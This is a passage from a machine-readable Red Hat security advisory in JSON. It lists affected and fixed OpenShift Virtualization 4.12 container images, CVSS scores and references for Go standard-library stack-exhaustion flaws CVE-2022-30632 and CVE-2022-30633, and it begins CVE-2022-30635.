"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-30632"
},
{
"category": "external",
"summary": "RHBZ#2107386",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-30632",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30632"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-30632",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30632"
},
{
"category": "external",
"summary": "https://go.dev/issue/53416",
"url": "https://go.dev/issue/53416"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE",
"url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE"
}
],
"release_date": "2022-07-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: path/filepath: stack exhaustion in Glob"
},
{
"cve": "CVE-2022-30633",
"cwe": {
"id": "CWE-1325",
"name": "Improperly Controlled Sequential Memory Allocation"
},
"discovery_date": "2022-07-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2107392"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. Calling Unmarshal on an XML document into a Go struct, which has a nested field that uses the \"any\" field tag, can cause a panic due to stack exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: encoding/xml: stack exhaustion in Unmarshal",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-30633"
},
{
"category": "external",
"summary": "RHBZ#2107392",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-30633",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30633"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-30633",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30633"
},
{
"category": "external",
"summary": "https://go.dev/issue/53611",
"url": "https://go.dev/issue/53611"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE",
"url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE"
}
],
"release_date": "2022-07-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: encoding/xml: stack exhaustion in Unmarshal"
},
{
"cve": "CVE-2022-30635",
"cwe": {
"id": "CWE-1325",
"name": "Improperly Controlled Sequential Memory Allocation"
},
"discovery_date": "2022-07-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
